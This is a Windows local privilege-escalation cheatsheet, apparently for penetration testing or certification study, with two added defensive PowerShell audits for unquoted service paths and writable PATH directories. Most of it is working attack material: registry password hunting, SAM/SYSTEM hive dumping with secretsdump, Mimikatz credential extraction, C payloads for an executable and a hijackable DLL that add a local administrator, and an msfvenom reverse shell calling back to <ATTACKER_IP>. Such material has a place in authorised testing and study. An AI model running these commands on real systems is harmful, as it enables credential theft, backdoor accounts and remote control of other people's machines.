Local Windows Cheatsheet
Global enumeration
PS C:\Users> Get-ChildItem -Path C:\ -Include *.kdbx,SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
PS C:\Users> Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.conf*,id_*,*.kdbx,*.pdf -File -Recurse -ErrorAction SilentlyContinue
#Registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
# Check installed software to choose which registry keys to query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Privileges and groups
Various commands:
C:\Users> whoami #Gives the username
C:\Users> whoami /priv #Gives the user privileges
C:\Users> net user <username> #Gives user groups
C:\Users> net user <username> /domain #Gives domain user groups
C:\Users> net localgroup #Gives local groups
PS C:\Users> Get-LocalGroupMember "Administrators" #Gives members of the Administrators group
Information on the current system
PS C:\Users> systeminfo #Gives system information
PS C:\Users> wmic qfe list #Lists installed updates
PS C:\Users> wmic qfe get Caption,Description,HotFixID,InstalledOn #Lists installed updates with more info
Network info
PS C:\Users> ipconfig /all #Gives network interface info
PS C:\Users> netstat -ano #Gives active network connections, with the owning PID
PS C:\Users> netstat -ano | findstr "LISTENING" #Gives listening ports, waiting for incoming connections
PS C:\Users> netstat -ano | findstr "ESTABLISHED" #Gives established connections
PS C:\Users> netstat -ano | findstr "CLOSE_WAIT" #Gives connections closed by the remote side, waiting for the local application to close
PS C:\Users> netstat -ano | findstr "TIME_WAIT" #Gives closed connections, waiting to ensure no more packets in transit
PS C:\Users> netstat -ano | findstr "SYN_SENT" #Gives connections waiting for remote SYN-ACK
PS C:\Users> netstat -ano | findstr "SYN_RECEIVED" #Gives half-open connections: SYN received and SYN-ACK sent, waiting for the final ACK
PS C:\Users> arp -a #Gives ARP entries / Useful for MITM
PS C:\Users> route print #Gives routing table
Services and apps installed
PS C:\Users> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname #Lists installed applications
PS C:\Users> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Where-Object {$_.DisplayName -like "*Adobe*"} #Lists applications containing "Adobe"
PS C:\Users> ls "C:\Program Files (x86)\" #Lists programs in "Program Files (x86)" folder
PS C:\Users> ls "C:\Program Files\" #Lists programs in "Program Files" folder
Info on running processes
PS C:\Users> Get-Process #Lists running processes
PS C:\Users> Get-Process | Where-Object {$_.Name -like "*sql*"} #Lists running processes containing "sql"
PS C:\Users> Get-CimInstance -ClassName win32_service | Where-Object {$_.StartName -eq "LocalSystem"} #Lists services running as the "LocalSystem" account (Get-Service objects have no StartName property)
PS C:\Users> Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'} #Lists running services with binary path and account
PS C:\Users> icacls "C:\xampp\apache\bin\httpd.exe" # Gives current user permissions on file
PS C:\Users> net stop httpd # Stops httpd service
PS C:\Users> net start httpd # Starts httpd service
PS C:\Users> Get-CimInstance -ClassName win32_service | Select Name, StartMode # Gives service startup mode (Auto, Manual, Disabled...)
PS C:\Users> shutdown /r /t 0 # Reboots machine
C:\Users> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """ # Gives non-Windows services whose binary path is not quoted
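A PowerShell audit for the unquoted-service-path misconfiguration the wmic/findstr one-liner above hunts for, as an added example that is not from the original cheatsheet. It parses each service path and lists the shorter prefixes Windows would try first, so an administrator can check that nobody but admins can write to those locations; Find-UnquotedServicePath is an assumed name. Run from an elevated prompt to see every service.

```powershell
# Added example: report services whose binary path is unquoted and contains a space
function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path.StartsWith('"')) { return }   # quoted or empty: unambiguous
        # Keep everything up to and including ".exe" to drop the arguments;
        # a path without ".exe" is kept whole (may include arguments)
        $exe = [regex]::Replace($path, '(?i)(\.exe).*$', '$1')
        if ($exe -notmatch ' ') { return }                      # no space: unambiguous
        # Each space yields a shorter candidate that CreateProcess tries before the real one
        $parts = $exe -split ' '
        $prefixes = for ($i = 0; $i -lt $parts.Count - 1; $i++) {
            ($parts[0..$i] -join ' ') + '.exe'
        }
        [pscustomobject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            RunsAs    = $_.StartName
            PathName  = $path
            Prefixes  = $prefixes -join '; '   # locations whose ACLs must restrict writes
        }
    }
}

Find-UnquotedServicePath | Format-Table -AutoSize
```

The fix for each finding is to quote the ImagePath value of the service (or reinstall the product so it registers a quoted path).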
Scheduled tasks
PS C:\Users> Get-ScheduledTask | ft Author,TaskPath,TaskName # Gives scheduled tasks for all users
PS C:\Users> schtasks /query /fo LIST /v | Select-String "TaskName" -Context 0,10 # Gives scheduled tasks
PS C:\Users> Get-ScheduledTask | Where-Object {$_.TaskPath -like "*Microsoft*"} | ft Author,TaskPath,TaskName # Gives scheduled tasks in "Microsoft" folder
PS C:\Users> Get-ScheduledTask | Where-Object {$_.TaskPath -like "*Microsoft*"} | Get-ScheduledTaskInfo | ft TaskName,LastRunTime,LastTaskResult # Gives scheduled tasks in "Microsoft" folder with last executions
Hash/password dumps
Via CMD/PS
Hive | Description | Hash type |
---|---|---|
HKLM\SAM | Contains the user password hashes | NTLM and LM (deprecated) |
HKLM\SECURITY | User security information (SIDs, roles, rights...) | - |
HKLM\SYSTEM | System information (hostname, SID...) | - |
NTDS.DIT | Active Directory database: password hashes of the AD users | NTLM, Kerberos |
C:\> reg save hklm\security c:\SECURITY #Saves "security" registry hive to "SECURITY" file
C:\> reg save hklm\sam c:\SAM #Saves "sam" registry hive to "SAM" file
C:\> reg save hklm\system c:\SYSTEM #Saves "system" registry hive to "SYSTEM" file
$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL # Extracts the hashes offline from the saved hives
Mimikatz
# Powershell Mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
# Executable Mimikatz
privilege::debug
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
Payloads
Malicious exe
#include <stdlib.h>

int main(void)
{
    int i;
    i = system("net user malicioususer helloWorld /add");              // create a local user
    i = system("net localgroup administrators malicioususer /add");    // add it to the local Administrators group
    (void)i;
    return 0;
}
kali@kali:~$ x86_64-w64-mingw32-gcc adduser.c -o adduser.exe # Compile payload
Malicious dll
DLL load order priority (default search order, SafeDllSearchMode enabled):
1. The directory the application was loaded from
2. The system directory (C:\Windows\System32)
3. The 16-bit system directory (C:\Windows\System)
4. The Windows directory (C:\Windows)
5. The current working directory
6. The directories listed in the PATH environment variable
List the content of the "path" environment variable
PS C:\Users> $env:path
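Since the search order above ends with the PATH directories, a directory on the PATH that standard users can write to is a hardening finding. The following audit is an added example, not from the original cheatsheet; the principal list and the function names are assumptions, and it only inspects Allow ACEs via Get-Acl.

```powershell
# Principals that every standard user belongs to (assumption; extend as needed)
$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'Everyone', 'NT AUTHORITY\INTERACTIVE')
# Rights that allow creating files or subfolders inside a directory
$WriteBits = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories'

function Test-WritableByStandardUser([string]$Dir) {
    # Only Allow ACEs are checked; an explicit Deny for the same principal is not
    # evaluated, so a $true result means "look closer", not proof of write access
    $acl = Get-Acl -LiteralPath $Dir -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteBits) -ne 0) { return $true }
    }
    return $false
}

function Get-PathDirectoryAudit {
    $env:Path -split ';' | ForEach-Object { $_.Trim() } | Where-Object { $_ } |
        Select-Object -Unique | ForEach-Object {
            $dir    = $_
            $exists = Test-Path -LiteralPath $dir -PathType Container
            [pscustomobject]@{
                Directory = $dir
                # A missing PATH directory is also a finding: whoever can create it controls it
                Exists    = $exists
                Writable  = if ($exists) { Test-WritableByStandardUser $dir } else { $null }
            }
        }
}

Get-PathDirectoryAudit | Where-Object { -not $_.Exists -or $_.Writable } | Format-Table -AutoSize
```

Remediation is to remove the directory from the system PATH or tighten its ACL so that only administrators can create files there.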
Payload:
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD  ul_reason_for_call, // Reason for calling function
    LPVOID lpReserved)         // Reserved
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: { // A process is loading the DLL (braces keep the declaration valid in C as well as C++)
        int i;
        i = system("net user malicioususer helloWorld /add");
        i = system("net localgroup administrators malicioususer /add");
        (void)i;
        break;
    }
    case DLL_THREAD_ATTACH:    // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:    // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH:   // A process unloads the DLL.
        break;
    }
    return TRUE;
}
kali@kali:~$ x86_64-w64-mingw32-gcc myDLL.cpp -shared -o myDLL.dll # Compile payload
PS C:\Users> Restart-Service <service> # Restart service
Metasploit
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<PORT> -f exe -o shell.exe
$ msfconsole
> use multi/handler
> set LHOST <ATTACKER_IP>
> set LPORT <PORT>
> set PAYLOAD windows/x64/shell_reverse_tcp
> run